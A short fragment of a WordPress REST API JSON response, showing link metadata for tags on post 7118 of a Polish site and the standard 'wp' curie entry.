tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}